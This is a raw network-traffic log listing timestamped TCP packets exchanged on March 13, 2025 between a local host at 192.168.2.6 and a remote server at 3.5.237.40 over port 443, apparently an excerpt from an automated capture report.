Mar 13, 2025 10:50:34.146014929 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.146837950 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.146856070 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.146893024 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.146923065 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.146928072 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.146954060 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.147030115 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.150957108 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.150975943 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.151020050 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.151046038 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.151052952 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.151079893 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.155175924 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.155203104 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.155277014 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.155277014 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.155286074 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.186137915 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.186155081 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.186222076 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.186239958 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.190273046 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.190298080 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.190330029 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.190339088 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.190386057 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.190392017 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.190428019 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.193803072 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.193820000 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.193897963 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.193906069 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.193947077 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.194433928 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.197902918 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.197920084 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.197962046 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.197968960 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.198003054 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.230284929 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.230318069 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.230370045 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.230380058 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.230391026 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.230453968 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.234397888 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.234421968 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.234461069 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.234483957 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.234488964 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.234568119 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.238502979 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.238523960 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.238571882 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.238584042 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.238589048 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.238646984 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.241931915 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.241949081 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.241995096 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.242033005 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.242041111 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.242100000 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.273027897 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.273063898 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.273113966 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.273124933 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.273183107 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.274955034 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.275015116 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.278548002 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.278568029 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.278635979 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.278635979 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.278646946 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.278734922 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.282690048 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.282708883 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.282751083 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.282767057 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.282773972 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.282839060 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.316087961 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.316126108 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.316176891 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.316274881 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.316289902 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.316339970 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.318885088 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.318902969 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.318969011 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.318978071 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.318985939 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.319022894 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.319046021 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.323065996 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.323091030 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.323137045 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.323141098 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.323151112 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.323200941 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.323221922 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.326589108 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.326625109 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.326663017 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.326684952 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.326697111 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.326723099 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.326749086 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.330657959 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.330681086 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.330714941 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.330741882 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.330749035 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.330885887 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.361829042 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.361907959 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.361941099 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.361949921 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.361975908 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.367222071 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.367275000 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.367317915 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.367322922 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.367341995 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.371218920 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.371253014 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.371279001 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.371292114 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.371299982 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.371344090 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.403443098 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.403470039 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.403583050 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.403594017 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.403644085 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.409064054 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.410947084 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.410984993 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.411011934 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.411017895 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.411047935 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.412631035 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.412687063 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.412708044 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.412717104 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.412744045 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.414540052 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.414598942 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.414616108 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.414621115 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.414653063 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.446374893 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.446444988 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.446574926 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.446587086 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.449848890 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.449911118 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.449997902 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.449999094 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.450025082 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.450059891 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.450475931 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.453876019 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.453923941 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.453989029 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.453994036 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.454027891 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.454061985 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.454066038 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.457964897 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.458019018 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.458084106 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.458090067 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.458161116 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.458168030 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.458220959 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.495739937 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.495798111 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.495872021 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.495884895 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.495928049 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.495934010 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.497597933 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.497685909 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.497715950 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.497723103 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.497757912 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.500555992 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.500592947 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.500622034 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.500639915 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.500647068 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.500686884 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.502188921 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.502206087 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.502235889 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.502269030 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.502274990 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.502302885 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.534945011 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.534975052 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.535286903 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.535296917 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.538511038 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.538536072 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.538621902 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.538634062 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.542737961 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.542762995 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.542864084 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.542871952 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.577117920 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.577137947 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.577265978 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.577277899 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.583148003 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.583172083 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.583260059 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.583266020 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.583333015 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.583930969 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.585921049 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.585943937 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.586040020 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.586045027 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.586095095 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.587696075 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.587712049 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.587764025 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.587785006 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.587790966 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.587835073 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.590679884 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.590697050 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.590728045 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.590775013 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.590780973 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.590827942 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.626096964 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.626120090 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.626156092 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.626271009 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.626277924 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.629854918 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.629878044 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.629992962 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.629998922 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.632446051 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.632453918 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.632525921 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.632531881 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.673891068 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.673927069 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.674005985 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.674021006 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.674062014 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.683125973 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.683146000 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.683263063 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.683275938 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.683283091 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.683293104 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.683339119 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.683376074 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.683383942 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.685461044 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.688791990 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.688813925 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.688843966 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.688884974 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.688891888 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.688915968 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.708192110 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.708211899 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.708317995 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.708329916 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.712657928 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.712673903 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.712766886 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.712775946 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.715948105 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.715966940 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.716037035 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.716047049 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.749900103 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.749923944 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.750070095 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.750082970 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.756880045 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.756907940 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.756977081 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.756988049 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.757023096 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.758712053 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.758727074 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.758821011 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.758826971 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.761548042 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.761571884 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.761609077 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.761641026 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.761647940 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.761697054 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.763958931 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.763974905 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.764015913 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.764041901 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.764045954 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.764079094 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.796396017 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.796418905 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.796526909 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.796540022 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.800615072 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.800652027 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.800709963 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.800717115 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.800748110 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.804570913 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.804622889 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.804687977 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.804697990 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.804734945 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.842509031 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.842592001 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.842684984 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.842700958 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.842725992 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.844180107 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.844238043 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.844263077 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.844270945 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.844304085 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.847120047 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.847183943 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.847223997 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.847232103 CET	443	49693	3.5.237.40	192.168.2.6
